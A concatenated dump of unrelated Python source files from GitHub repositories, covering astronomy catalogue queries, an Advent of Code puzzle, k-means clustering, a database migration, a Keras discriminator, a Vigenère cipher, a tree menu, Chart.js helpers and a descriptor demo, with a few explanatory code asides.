If you want to\n keep some stars outside the edges, put negative values (e.g., ``-5``).\n\n origin : int, optional\n Whether to return 0 or 1-based pixel coordinates.\n\n mode: 'all' or 'wcs', optional\n Whether to do the transformation including distortions (``'all'``) or\n only including only the core WCS transformation (``'wcs'``).\n '''\n if not (header is None) ^ (wcs is None):\n raise ValueError(\"One and only one of header and wcs should be given.\")\n\n _tab = table.copy()\n if isinstance(table, pd.DataFrame):\n _tab = Table.from_pandas(table)\n elif not isinstance(table, Table):\n raise TypeError(\n \"table must be either astropy Table or pandas DataFrame.\")\n\n if wcs is None:\n wcs = WCS(header)\n\n coo = SkyCoord(_tab[ra_key], _tab[dec_key])\n x, y = coo.to_pixel(wcs=wcs, origin=0, mode=mode)\n\n nx, ny = header['naxis1'], header['naxis2']\n mask = ((x < (0 + bezel))\n | (x > (nx - bezel))\n | (y < (0 + bezel))\n | (y > (ny - bezel)))\n x = x[~mask]\n y = y[~mask]\n _tab.remove_rows(mask)\n\n _tab[\"x\"] = x\n _tab[\"y\"] = y\n\n return _tab\n\n\n\"\"\"\ndef sdss2BV(g, r, gerr=None, rerr=None):\n '''\n Pan-STARRS DR1 (PS1) uses AB mag.\n https://www.sdss.org/dr12/algorithms/fluxcal/#SDSStoAB\n Jester et al. (2005) and Lupton (2005):\n https://www.sdss.org/dr12/algorithms/sdssubvritransform/\n Here I used Lupton. Application to PS1, it seems like Jester - Lupton VS\n Lupton V mag is scattered around -0.013 +- 0.003 (minmax = -0.025, -0.005)\n --> Lupton conversion is fainter.\n V = g - 0.5784*(g - r) - 0.0038; sigma = 0.0054\n '''\n if gerr is None:\n gerr = np.zeros_like(g)\n\n if rerr is None:\n rerr = np.zeros_like(r)\n\n V = g - 0.5784 * (g - r) - 0.0038\n dV = np.sqrt((1.5784 * gerr)**2 + (0.5784 * rerr)**2 + 0.0052**2)\n return V, dV\n\"\"\"\n\n\ndef panstarrs_query(ra_deg, dec_deg, radius=None, inner_radius=None,\n width=None, height=None, columns=None, column_filters={}):\n \"\"\"\n DEPRECATED\n \"\"\"\n print(\"panstarrs_query is deprecated. 
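A worked number for the commented-out Lupton transform above: with g = 15.0 and r = 14.5,

    g, r = 15.0, 14.5
    print(g - 0.5784 * (g - r) - 0.0038)   # ~14.707

Two things to double-check if this helper is ever revived: since V = 0.4216*g + 0.5784*r - 0.0038, the propagated error on g should carry a coefficient of 0.4216 (= 1 - 0.5784) rather than the 1.5784 in the commented code, and the docstring quotes a scatter of 0.0054 while the formula adds 0.0052.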
Use PanSTARRS1.\")\n ps1 = PanSTARRS1(ra=ra_deg*u.deg, dec=dec_deg*u.deg,\n radius=radius, inner_radius=inner_radius,\n width=width, height=height,\n columns=columns, column_filters=column_filters)\n\n return ps1.queried\n","repo_name":"ysBach/IshiguroM_etal_155140_2005UD","sub_path":"photometry/ysphotutilpy/ysphotutilpy/queryutil.py","file_name":"queryutil.py","file_ext":"py","file_size_in_byte":29021,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"} +{"seq_id":"40381183675","text":"# from collections import *\n# from itertools import *\n# from math import *\nfrom submit_answer import submit_answer\n\n\n\n# N E S W\nchr = [-1, 0, 1, 0, -1, -1, 1, 1]\nchc = [0, 1, 0, -1, -1, 1, -1, 1]\n\n\nLEVEL = 2\nSAMPLE_ANSWERS = [3, 1623178306]\nSAMPLE_ANSWER = SAMPLE_ANSWERS[LEVEL - 1]\n\n\ndef solve(input_string: str) -> int or str:\n # A = list(input_string)\n # A = list(map(int, input_string.split(',')))\n # A = [line for line in input_string.split('\\n')]\n A = [int(line) for line in input_string.split('\\n')]\n # A = [list(map(int, line)) for line in input_string.split('\\n')]\n\n N = len(A)\n print(\"N =\", N)\n print(A[:10])\n # M = len(A[0])\n\n if LEVEL == 2:\n KEY = 811589153\n A = [x * KEY for x in A]\n\n M = 1 if LEVEL == 1 else 10\n\n values = [(A[i], i) for i in range(N)]\n for _ in range(M):\n for i in range(N):\n cur = values.index((A[i], i))\n val = values.pop(cur)\n cur = (cur + val[0]) % len(values)\n if cur == 0:\n cur = N\n values.insert(cur, val)\n # for a in values:\n # print(a[0], end=' ')\n # print()\n\n zero = values.index((0, A.index(0)))\n ans = 0\n for i in range(0, 3000, 1000):\n ans += values[(1000 + i + zero) % N][0]\n return ans\n\n\ndef main():\n with open(\"sample.txt\") as sample_file:\n sample_input = sample_file.read().strip('\\n')\n sample_answer = solve(sample_input)\n print(\"Answer for sample:\", sample_answer)\n assert sample_answer == SAMPLE_ANSWER and sample_answer is not None, f\"Got {sample_answer} instead of {SAMPLE_ANSWER}\"\n\n with open(\"input.txt\") as input_file:\n inp = input_file.read().strip('\\n')\n answer = solve(inp)\n print(\"Answer:\", answer)\n assert submit_answer(2022, 20, LEVEL, answer) is True\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"qpwoeirut/competitive-programming","sub_path":"AdventOfCode/2022/day20/day20.py","file_name":"day20.py","file_ext":"py","file_size_in_byte":1898,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"51"} +{"seq_id":"11248569870","text":"import numpy as np\nfrom numpy.linalg import norm\n\n\nclass Kmeans:\n def __init__(self,variant = None, max_iter=30, tolerance=1e-12):\n self.max_iter=max_iter\n self.variant = variant\n self.tolerance = tolerance\n \n def __calculate_centroid(self,X,Y,k):\n centroids = np.zeros(shape=(k,X.shape[1]))\n for i in range(k):\n centroids[i,:] = np.mean(X[Y==i],axis=0)\n return centroids\n\n def __kmeansplus(self,X,k):\n indices = np.random.choice(np.unique(X,axis=0).shape[0], size=1,replace=False) \n centroids = X[indices]\n labels = np.zeros(shape=(X.shape[0]))\n\n\n for i in range(k-1):\n # print(\"k:\",i)\n distance = np.zeros(shape=(X.shape[0],i+1))\n # print(centroids)\n for j in range(len(X)):\n distance[j,:] = norm(X[j,:]-centroids, axis=1)\n cluster_index = np.argmin(distance[j,:], axis=0)\n labels[j] = cluster_index\n\n cents = np.zeros(shape=X.shape)\n labels = labels.astype('int')\n cents = centroids[labels]\n max_distance = np.argmax(norm(X-cents,axis=1))\n 
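# Aside: the seeding above keeps the point *farthest* from the current centroids,
# i.e. maxmin (farthest-point) initialisation. Classic k-means++ instead samples
# new centers with probability proportional to squared distance. A minimal,
# self-contained sketch (assumes numpy is already imported as np, as it is at the
# top of this file; illustrative only, not part of the class):
def kmeanspp_seed(X, k, rng=None):
    rng = rng or np.random.default_rng(0)
    centroids = [X[rng.integers(len(X))]]
    for _ in range(k - 1):
        # squared distance from every point to its nearest chosen centroid
        d2 = np.min([((X - c) ** 2).sum(axis=1) for c in centroids], axis=0)
        centroids.append(X[rng.choice(len(X), p=d2 / d2.sum())])
    return np.array(centroids)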
centroids = list(centroids)\n centroids.append(X[max_distance])\n centroids = np.array(centroids)\n return centroids\n\n\n def fit(self, X, k):\n self.k = k\n self.X = X\n \n if self.variant=='kmeans++':\n print(\"Running KMeans++\")\n centroids = self.__kmeansplus(X,k)\n \n else:\n indices = np.random.choice(np.unique(X,axis=0).shape[0], size=k,replace=False)\n centroids = X[indices]\n \n distance = np.zeros(shape=(X.shape[0],k))\n labels = np.zeros(shape=(X.shape[0]))\n for i in range(self.max_iter):\n prev_centroids = centroids\n for j in range(len(X)):\n distance[j,:] = norm(X[j,:]-prev_centroids, axis=1)\n cluster_index = np.argmin(distance[j,:], axis=0)\n labels[j] = cluster_index\n centroids = self.__calculate_centroid(X,labels,k)\n if norm(prev_centroids-centroids) <= self.tolerance:\n break\n return centroids, labels\n \n \n \n \n \n \n \n \n\n \n \n \n ","repo_name":"harshit206/Clustering-Methods-Applications","sub_path":"kmeans.py","file_name":"kmeans.py","file_ext":"py","file_size_in_byte":2361,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"40302009024","text":"import uuid\n\n# NOC modules\nfrom noc.core.migration.base import BaseMigration\nfrom noc.core.model.fields import DocumentReferenceField\n\n\nclass Migration(BaseMigration):\n def migrate(self):\n # Select profile names\n profiles = set(\n r[0] for r in self.db.execute(\"SELECT DISTINCT profile_name FROM sa_managedobject\")\n )\n # Create profile records\n pcoll = self.mongo_db[\"noc.profiles\"]\n for p in profiles:\n u = uuid.uuid4()\n pcoll.update_many(\n {\"name\": p}, {\"$set\": {\"name\": p}, \"$setOnInsert\": {\"uuid\": u}}, upsert=True\n )\n # Get profile record mappings\n pmap = {} # name -> id\n for d in pcoll.find({}, {\"_id\": 1, \"name\": 1}):\n pmap[d[\"name\"]] = str(d[\"_id\"])\n # Create .profile field\n self.db.add_column(\n \"sa_managedobject\",\n \"profile\",\n DocumentReferenceField(\"inv.Profile\", null=True, blank=True),\n )\n # Migrate profile data\n for p in profiles:\n self.db.execute(\n \"\"\"\n UPDATE sa_managedobject\n SET profile = %s\n WHERE profile_name = %s\n \"\"\",\n [pmap[p], p],\n )\n self.db.execute(\n \"\"\"\n UPDATE sa_managedobjectselector\n SET filter_profile = %s\n WHERE filter_profile = %s\n \"\"\",\n [pmap[p], p],\n )\n # Set profile as not null\n self.db.execute(\"ALTER TABLE sa_managedobject ALTER profile SET NOT NULL\")\n # Drop legacy profile_name\n self.db.delete_column(\"sa_managedobject\", \"profile_name\")\n","repo_name":"nocproject/noc","sub_path":"sa/migrations/0150_managed_object_profile.py","file_name":"0150_managed_object_profile.py","file_ext":"py","file_size_in_byte":1733,"program_lang":"python","lang":"en","doc_type":"code","stars":108,"dataset":"github-code","pt":"51"} +{"seq_id":"25500682022","text":"###################\n# imports\nimport sys\nimport numpy as np\nfrom keras.layers import Input, Dense, Reshape, Flatten, Dropout\nfrom keras.layers.advanced_activations import LeakyReLU\nfrom keras.models import Sequential, Model\nfrom keras.optimizers import Adam\n\nclass Discriminator(object):\n def __init__(self, width=28, height=28, channels=1, latent_size=100):\n #initialize variables\n self.CAPACITY = width*height*channels\n self.SHAPE = (width,height,channels)\n self.OPTIMIZER = Adam(lr=0.0002, decay=8e-9)\n self.Discriminator = self.model()\n self.Discriminator.compile(loss='binary_crossentropy', optimizer=self.OPTIMIZER, metrics=['accuracy'])\n self.Discriminator.summary()\n \n def 
model(self):\n        # build binary classifier and return it\n        model = Sequential()\n        model.add(Flatten(input_shape=self.SHAPE))\n        # Layer 1\n        model.add(Dense(self.CAPACITY, input_shape=self.SHAPE)) #FC1\n        model.add(LeakyReLU(alpha=0.2)) #FC1 Activation Function\n        # Layer 2\n        model.add(Dense(int(self.CAPACITY/2))) #FC2\n        model.add(LeakyReLU(alpha=0.2)) #FC2 Activation Function\n        # Output Layer\n        model.add(Dense(1, activation='sigmoid')) # Out - probability of class or not\n        \n        return model\n    \n    def summary(self):\n        # prints the model summary to the screen\n        return self.Discriminator.summary()\n\n    def save_model(self):\n        # saves the model structure to a file in the data folder\n        from keras.utils import plot_model  # import was missing; plot_model is undefined otherwise\n        plot_model(self.Discriminator, to_file='/data/Discriminator_Model.png')  # plot_model accepts the Sequential itself\n\n\n","repo_name":"KausthubK/gan-mnist","sub_path":"discriminator.py","file_name":"discriminator.py","file_ext":"py","file_size_in_byte":1696,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"4761503023","text":"from cs50 import get_string\nimport sys\n\n\n\"\"\"Checking for proper usage\"\"\"\n\nif len(sys.argv) != 2:\n    sys.exit(\"Usage: python vigenere.py k\")\n\nif not sys.argv[1].isalpha():\n    sys.exit(\"Usage: python vigenere.py k\")\n\n\nKey = sys.argv[1].lower()\n\n\n\"\"\"Building an alphabet list and a letter-->number dictionary for later\"\"\"\n\nalphabet = [\"a\", \"b\", \"c\", \"d\", \"e\", \"f\", \"g\", \"h\", \"i\", \"j\", \"k\", \"l\",\n            \"m\", \"n\", \"o\", \"p\", \"q\", \"r\", \"s\", \"t\", \"u\", \"v\", \"w\", \"x\", \"y\", \"z\"]\n\nalpha_dict = {letter: idx for idx, letter in enumerate(alphabet)}\n\nMSG = get_string(\"plaintext: \")\nITL = len(Key)\nMSG2 = \"\"\nspace = 0\n\nfor i in range(len(MSG)):\n    if MSG[i] == \" \":\n        space += 1\n    if MSG[i].isalpha():\n        if MSG[i].isupper():\n            MSG2 += alphabet[(alpha_dict[MSG[i].lower()] + alpha_dict[Key[(i + space) % ITL]]) % 26].upper()\n        else:\n            MSG2 += alphabet[(alpha_dict[MSG[i]] + alpha_dict[Key[(i + space) % ITL]]) % 26]\n\n    else:\n        MSG2 += MSG[i]\n\nprint(\"ciphertext:\", MSG2)\n","repo_name":"PozzettiAndrea/CS50","sub_path":"pset6/vigenere/vigenere.py","file_name":"vigenere.py","file_ext":"py","file_size_in_byte":1011,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"32461691939","text":"'''\nCreated on 2016/07/13\n\n@author: rondelion\n'''\nclass GoStraight(object):\n    '''\n    classdocs\n    '''\n    def action(self, input, states, parameters):\n        thrust=1.0\n        steering=0.0\n        if \"velocity\" in input and input[\"velocity\"]>0.03:  # dict.has_key() was removed in Python 3\n            thrust=0.0\n        states[\"steering\"]=steering\n        states[\"thrust\"]=thrust\n        return\n    \n    def getName(self):\n        return \"GoStraight\"\n","repo_name":"rondelion/Lingadrome","sub_path":"Version2/src/Lingadrome/Actions/GoStraight.py","file_name":"GoStraight.py","file_ext":"py","file_size_in_byte":422,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"25489435206","text":"from arv_filho_esquerda_irmao_direita import ArvFilhoEsqIrmaoDir\nimport os\ndef cls():\n    print(\"\\n\" * 100)\n\nprint( \"############################################################\")\nprint(\"MENU :::: ARVORE N-ARIA :::: FILHO ESQUERDA - IRMAO DIREITA \\n\")\nprint(\"CRIAR ARVORE N- ARIA\")\nprint( \"############################################################\\n\\n\")\nr = int(input(\"RAIZ :: \"))\n\nraiz = ArvFilhoEsqIrmaoDir()\nraiz.criarArvoreNaria(r)\n\ncls()\ncontrole = 9\n\nwhile(controle != 0 ):\n    print(
\"############################################################\")\n print(\"MENU :::: ARVORE N-ARIA :::: FILHO ESQUERDA - IRMAO DIREITA \\n\")\n print(\"1 - INSERIR NO\")\n print(\"2 - EXCLUIR NO\")\n print(\"3 - EXIBIR ARVORE \")\n print(\"4 - ESTA NA AVORE \")\n print(\"5 - LIMPAR ARVORE \")\n print(\"0 - SAIR\")\n print( \"############################################################\\n\\n\")\n\n controle = int(input(\"RESPOSTA:: \"))\n\n\n if controle == 1:\n no = int(input(\"INSERIR EM QUAL NÓ? \"))\n info = int(input(\"QUAL VALOR? \"))\n retorno = raiz.inserirArvoreNaria(no, info)\n if retorno:\n cls()\n print(\"INSERIDO COM SUCESSO!!! \\n\")\n os.system('pause')\n cls()\n else:\n cls()\n print(\"NAO EXISTE ESSE NO\")\n os.system('pause')\n cls()\n elif controle == 2:\n no = int(input(\"EXCLUIR QUAL NO? \"))\n if no == raiz.info:\n raiz.excluirNo(raiz.filhoEsq.info)\n raiz = None\n cls()\n print(\"ARVORE VAZIA!!\")\n os.system('pause')\n controle = 0\n else:\n resultado = raiz.excluirNo(no)\n if resultado:\n cls()\n print(\"EXCLUIDO COM SUCESSO!!! \\n\")\n os.system('pause')\n cls()\n else:\n cls()\n print(\"NAO FOI POSSIVEL EXCLUIR O NO\")\n os.system('pause')\n cls()\n elif controle == 3:\n cls()\n print(\"ARVORE:: \")\n resultado = raiz.exibirArvoreNaria()\n print(\"\")\n os.system('pause')\n cls()\n elif controle == 4:\n no = int(input(\"VERIFICAR QUAL NO? \"))\n resultado = raiz.existeNo(no)\n if resultado:\n print(\"NO EXISTE NA ARVORE!! \")\n else:\n print(\"NO NAO EXISTE NA ARVORE!! \")\n\n os.system('pause')\n cls()\n elif controle == 5:\n raiz.exibirArvoreNaria()\n if (raiz.filhoEsq is not None):\n resultado = raiz.excluirNo(raiz.filhoEsq.info)\n else:\n raiz = None\n resultado = True\n if resultado:\n raiz = None\n cls()\n print(\"ARVORE VAZIA!\")\n os.system('pause')\n controle = 0\nelse:\n print(\"FALOU!\")\n\n\n\n\n","repo_name":"patrickvianna/arvore-naria","sub_path":"main_filho_esquerdo_irmao_direito.py","file_name":"main_filho_esquerdo_irmao_direito.py","file_ext":"py","file_size_in_byte":2855,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"14234440165","text":"\nimport numpy as np\n\ndef clean_dict(**kwargs):\n \"Like dict but with no None values make some values JSON serializable\"\n # XXXX this should move to jp_proxy_widgets\n result = {}\n for kw in kwargs:\n v = kwargs[kw]\n if v is not None:\n if isinstance(v, np.ndarray):\n # listiffy arrays -- maybe should be done elsewhere\n v = v.tolist()\n if isinstance(v, np.floating):\n v = float(v)\n if type(v) is tuple:\n v = list(v)\n result[kw] = v\n return result\n\ndef options(\n responsive=True,\n legend=None,\n title=None,\n animation=None,\n **other_arguments\n ):\n return clean_dict(\n responsive=responsive,\n legend=legend,\n title=title,\n animation=animation,\n **other_arguments\n )\n\ndef config(\n type,\n data,\n options=None,\n **other_arguments,\n ):\n if options is None: # noqa\n options = {} # noqa\n return clean_dict(\n type=type,\n data=data,\n options=options,\n **other_arguments,\n )\n\ndef data(\n datasets,\n labels=None,\n **other_arguments\n ):\n return clean_dict(\n datasets=datasets,\n labels=labels,\n **other_arguments\n )\n\ndef dataset(\n data,\n label=None,\n backgroundColor=None, \n **other_arguments\n ):\n return clean_dict(\n data=data,\n label=label,\n backgroundColor=backgroundColor,\n **other_arguments,\n )\n\ndef scales(\n xAxes = None,\n yAxes = None,\n **other_arguments,\n ):\n return clean_dict(\n xAxes = xAxes,\n 
yAxes = yAxes,\n **other_arguments,\n )\n\ndef axes(\n display = True,\n scaleLabel = None,\n stacked = False,\n **other_arguments,\n ):\n return clean_dict(\n display = display,\n scaleLabel = scaleLabel,\n stacked = stacked,\n **other_arguments,\n )\n\ncolor_name = ['aliceblue', 'antiquewhite', 'aqua', \n 'aquamarine', 'azure', 'beige', 'bisque', \n 'black', 'blanchedalmond', 'blue', 'blueviolet', \n 'brown', 'burlywood', 'cadetblue', 'chartreuse', \n 'chocolate', 'coral', 'cornflowerblue', 'cornsilk', \n 'crimson', 'cyan', 'darkblue', 'darkcyan', \n 'darkgoldenrod', 'darkgray', 'darkgreen', 'darkgrey', \n 'darkkhaki', 'darkmagenta', 'darkolivegreen', 'darkorange', \n 'darkorchid', 'darkred', 'darksalmon', 'darkseagreen', \n 'darkslateblue', 'darkslategray', 'darkslategrey', 'darkturquoise', \n 'darkviolet', 'deeppink', 'deepskyblue', 'dimgray', \n 'dimgrey', 'dodgerblue', 'firebrick', 'floralwhite', \n 'forestgreen', 'fuchsia', 'gainsboro', 'ghostwhite', \n 'gold', 'goldenrod', 'gray', 'green', 'greenyellow', \n 'grey', 'honeydew', 'hotpink', 'indianred', 'indigo', \n 'ivory', 'khaki', 'lavender', 'lavenderblush', 'lawngreen', \n 'lemonchiffon', 'lightblue', 'lightcoral', 'lightcyan', \n 'lightgoldenrodyellow', 'lightgray', 'lightgreen', \n 'lightgrey', 'lightpink', 'lightsalmon', 'lightseagreen', \n 'lightskyblue', 'lightslategray', 'lightslategrey', \n 'lightsteelblue', 'lightyellow', 'lime', 'limegreen', \n 'linen', 'magenta', 'maroon', 'mediumaquamarine', 'mediumblue', \n 'mediumorchid', 'mediumpurple', 'mediumseagreen', 'mediumslateblue', \n 'mediumspringgreen', 'mediumturquoise', 'mediumvioletred', \n 'midnightblue', 'mintcream', 'mistyrose', 'moccasin',\n 'navajowhite', 'navy', 'oldlace', 'olive', 'olivedrab', \n 'orange', 'orangered', 'orchid', 'palegoldenrod', \n 'palegreen', 'paleturquoise', 'palevioletred', 'papayawhip', \n 'peachpuff', 'peru', 'pink', 'plum', 'powderblue', \n 'purple', 'rebeccapurple', 'red', 'rosybrown', 'royalblue', \n 'saddlebrown', 'salmon', 'sandybrown', 'seagreen', \n 'seashell', 'sienna', 'silver', 'skyblue', 'slateblue',\n 'slategray', 'slategrey', 'snow', 'springgreen', \n 'steelblue', 'tan', 'teal', 'thistle', 'tomato', \n 'turquoise', 'violet', 'wheat', 'white', \n 'whitesmoke', 'yellow', 'yellowgreen'\n ]\ncolorName = {\n \"aliceblue\": [240, 248, 255],\n \"antiquewhite\": [250, 235, 215],\n \"aqua\": [0, 255, 255],\n \"aquamarine\": [127, 255, 212],\n \"azure\": [240, 255, 255],\n \"beige\": [245, 245, 220],\n \"bisque\": [255, 228, 196],\n \"black\": [0, 0, 0],\n \"blanchedalmond\": [255, 235, 205],\n \"blue\": [0, 0, 255],\n \"blueviolet\": [138, 43, 226],\n \"brown\": [165, 42, 42],\n \"burlywood\": [222, 184, 135],\n \"cadetblue\": [95, 158, 160],\n \"chartreuse\": [127, 255, 0],\n \"chocolate\": [210, 105, 30],\n \"coral\": [255, 127, 80],\n \"cornflowerblue\": [100, 149, 237],\n \"cornsilk\": [255, 248, 220],\n \"crimson\": [220, 20, 60],\n \"cyan\": [0, 255, 255],\n \"darkblue\": [0, 0, 139],\n \"darkcyan\": [0, 139, 139],\n \"darkgoldenrod\": [184, 134, 11],\n \"darkgray\": [169, 169, 169],\n \"darkgreen\": [0, 100, 0],\n \"darkgrey\": [169, 169, 169],\n \"darkkhaki\": [189, 183, 107],\n \"darkmagenta\": [139, 0, 139],\n \"darkolivegreen\": [85, 107, 47],\n \"darkorange\": [255, 140, 0],\n \"darkorchid\": [153, 50, 204],\n \"darkred\": [139, 0, 0],\n \"darksalmon\": [233, 150, 122],\n \"darkseagreen\": [143, 188, 143],\n \"darkslateblue\": [72, 61, 139],\n \"darkslategray\": [47, 79, 79],\n \"darkslategrey\": [47, 79, 79],\n 
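A hedged sketch of how the helpers above compose into a Chart.js-style configuration dict (all values are made up; ``clean_dict`` silently drops the ``None`` entries):

    bar = config(
        type="bar",
        data=data(
            datasets=[dataset(data=[3, 1, 4], label="demo",
                              backgroundColor="steelblue")],
            labels=["a", "b", "c"],
        ),
        options=options(title={"display": True, "text": "demo chart"}),
    )
    print(bar["type"], bar["data"]["labels"])   # bar ['a', 'b', 'c']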
\"darkturquoise\": [0, 206, 209],\n \"darkviolet\": [148, 0, 211],\n \"deeppink\": [255, 20, 147],\n \"deepskyblue\": [0, 191, 255],\n \"dimgray\": [105, 105, 105],\n \"dimgrey\": [105, 105, 105],\n \"dodgerblue\": [30, 144, 255],\n \"firebrick\": [178, 34, 34],\n \"floralwhite\": [255, 250, 240],\n \"forestgreen\": [34, 139, 34],\n \"fuchsia\": [255, 0, 255],\n \"gainsboro\": [220, 220, 220],\n \"ghostwhite\": [248, 248, 255],\n \"gold\": [255, 215, 0],\n \"goldenrod\": [218, 165, 32],\n \"gray\": [128, 128, 128],\n \"green\": [0, 128, 0],\n \"greenyellow\": [173, 255, 47],\n \"grey\": [128, 128, 128],\n \"honeydew\": [240, 255, 240],\n \"hotpink\": [255, 105, 180],\n \"indianred\": [205, 92, 92],\n \"indigo\": [75, 0, 130],\n \"ivory\": [255, 255, 240],\n \"khaki\": [240, 230, 140],\n \"lavender\": [230, 230, 250],\n \"lavenderblush\": [255, 240, 245],\n \"lawngreen\": [124, 252, 0],\n \"lemonchiffon\": [255, 250, 205],\n \"lightblue\": [173, 216, 230],\n \"lightcoral\": [240, 128, 128],\n \"lightcyan\": [224, 255, 255],\n \"lightgoldenrodyellow\": [250, 250, 210],\n \"lightgray\": [211, 211, 211],\n \"lightgreen\": [144, 238, 144],\n \"lightgrey\": [211, 211, 211],\n \"lightpink\": [255, 182, 193],\n \"lightsalmon\": [255, 160, 122],\n \"lightseagreen\": [32, 178, 170],\n \"lightskyblue\": [135, 206, 250],\n \"lightslategray\": [119, 136, 153],\n \"lightslategrey\": [119, 136, 153],\n \"lightsteelblue\": [176, 196, 222],\n \"lightyellow\": [255, 255, 224],\n \"lime\": [0, 255, 0],\n \"limegreen\": [50, 205, 50],\n \"linen\": [250, 240, 230],\n \"magenta\": [255, 0, 255],\n \"maroon\": [128, 0, 0],\n \"mediumaquamarine\": [102, 205, 170],\n \"mediumblue\": [0, 0, 205],\n \"mediumorchid\": [186, 85, 211],\n \"mediumpurple\": [147, 112, 219],\n \"mediumseagreen\": [60, 179, 113],\n \"mediumslateblue\": [123, 104, 238],\n \"mediumspringgreen\": [0, 250, 154],\n \"mediumturquoise\": [72, 209, 204],\n \"mediumvioletred\": [199, 21, 133],\n \"midnightblue\": [25, 25, 112],\n \"mintcream\": [245, 255, 250],\n \"mistyrose\": [255, 228, 225],\n \"moccasin\": [255, 228, 181],\n \"navajowhite\": [255, 222, 173],\n \"navy\": [0, 0, 128],\n \"oldlace\": [253, 245, 230],\n \"olive\": [128, 128, 0],\n \"olivedrab\": [107, 142, 35],\n \"orange\": [255, 165, 0],\n \"orangered\": [255, 69, 0],\n \"orchid\": [218, 112, 214],\n \"palegoldenrod\": [238, 232, 170],\n \"palegreen\": [152, 251, 152],\n \"paleturquoise\": [175, 238, 238],\n \"palevioletred\": [219, 112, 147],\n \"papayawhip\": [255, 239, 213],\n \"peachpuff\": [255, 218, 185],\n \"peru\": [205, 133, 63],\n \"pink\": [255, 192, 203],\n \"plum\": [221, 160, 221],\n \"powderblue\": [176, 224, 230],\n \"purple\": [128, 0, 128],\n \"rebeccapurple\": [102, 51, 153],\n \"red\": [255, 0, 0],\n \"rosybrown\": [188, 143, 143],\n \"royalblue\": [65, 105, 225],\n \"saddlebrown\": [139, 69, 19],\n \"salmon\": [250, 128, 114],\n \"sandybrown\": [244, 164, 96],\n \"seagreen\": [46, 139, 87],\n \"seashell\": [255, 245, 238],\n \"sienna\": [160, 82, 45],\n \"silver\": [192, 192, 192],\n \"skyblue\": [135, 206, 235],\n \"slateblue\": [106, 90, 205],\n \"slategray\": [112, 128, 144],\n \"slategrey\": [112, 128, 144],\n \"snow\": [255, 250, 250],\n \"springgreen\": [0, 255, 127],\n \"steelblue\": [70, 130, 180],\n \"tan\": [210, 180, 140],\n \"teal\": [0, 128, 128],\n \"thistle\": [216, 191, 216],\n \"tomato\": [255, 99, 71],\n \"turquoise\": [64, 224, 208],\n \"violet\": [238, 130, 238],\n \"wheat\": [245, 222, 179],\n \"white\": [255, 255, 255],\n \"whitesmoke\": 
[245, 245, 245],\n \"yellow\": [255, 255, 0],\n \"yellowgreen\": [154, 205, 50]\n }\n\ndef color_rgb(color_name, opaque=1):\n if not isinstance(color_name,str):\n raise ValueError \n color_name = color_name.lower()\n if color_name not in colorName:\n raise KeyError\n [r, g, b] = colorName[color_name]\n return 'rgb(%d, %d, %d, %f)' %(r, g, b, opaque)\n\n","repo_name":"AaronWatters/Chart_ipynb","sub_path":"chart_ipynb/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":9925,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"} +{"seq_id":"42439967226","text":"# p642~p646\r\n# created by Jingu Kang on 01-29\r\n# reference: Fluent Python by Luciano Ramalho\r\n\r\n# more abstract python.\r\n\r\ndef cls_name(obj_or_cls):\r\n cls = type(obj_or_cls)\r\n if cls is type:\r\n cls = obj_or_cls\r\n return cls.__name__.split('.')[-1]\r\n\r\ndef display(obj):\r\n cls = type(obj)\r\n\r\n if cls is type:\r\n return ''.format(obj.__name__)\r\n elif cls in [type(None), int]:\r\n return repr(obj)\r\n else:\r\n return '<{} object>'.format(cls_name(obj))\r\n\r\ndef print_args(name, *args):\r\n pseudo_args = ', '.join(display(x) for x in args)\r\n print('-> {}.__{}__({})'.format(cls_name(args[0]), name, pseudo_args))\r\n\r\n## essential classes for this example\r\n\r\nclass Overriding:\r\n \"\"\"a.k.a data descriptor or enforced descriptor\"\"\"\r\n\r\n def __get__(self, instance, owner):\r\n print_args('get', self, instance, owner)\r\n\r\n def __set__(self, instance, value):\r\n print_args('set', self, instance, value)\r\n\r\nclass overridingNoGet:\r\n \"\"\"an overriding descriptor without __get__\"\"\"\r\n def __set__(self, instance, value):\r\n print_args('set', self, instance, value)\r\n\r\nclass NonOverriding:\r\n \"\"\"a.k.a. 
non-data or shadowable descriptor\"\"\"\r\n def __get__(self, instance, owner):\r\n print_args('get', self, instance, owner)\r\n\r\nclass Managed:\r\n over = Overriding()\r\n over_no_get = overridingNoGet()\r\n non_over = NonOverriding()\r\n\r\n def spam(self):\r\n print('-> managed.spam({})'.format(display(self)))\r\n\r\nobj = Managed()\r\n\r\nobj.over\r\nManaged.over\r\nprint(vars(obj))\r\n\r\nobj.over = 8\r\nobj.over\r\nManaged.over\r\n\r\nobj.__dict__['over'] = 8\r\nprint(vars(obj))\r\n\r\nprint(obj.over_no_get)\r\nprint(Managed.over_no_get)\r\nobj.over_no_get = 9\r\nprint(obj.over_no_get)\r\nobj.__dict__['over_no_get'] = 9\r\nprint(obj.over_no_get)\r\n\r\nobj.over_no_get = 99\r\nprint(obj.over_no_get) # not gonna be changed to 99\r\n\r\nobj.__dict__['over_no_get'] = 99\r\nprint(obj.over_no_get) # changed to 99\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"kibitzing/FluentPython","sub_path":"archive/To02-01/01-30/jingu_01-30.py","file_name":"jingu_01-30.py","file_ext":"py","file_size_in_byte":1976,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"51"} +{"seq_id":"8922782379","text":"import geopandas as gpd\nimport pandas as pd\n\n\ndef combine_geojsons(data_dict):\n result = []\n for data in ['train_geojson', 'test_geojson']:\n geo = gpd.read_file(data_dict[list(data_dict.keys())[0]]['path'] + data_dict[list(data_dict.keys())[0]][data])\n geo['name'] = list(data_dict.keys())[0]\n geo.set_index('id', inplace=True)\n for name in list(data_dict.keys())[1:]:\n if 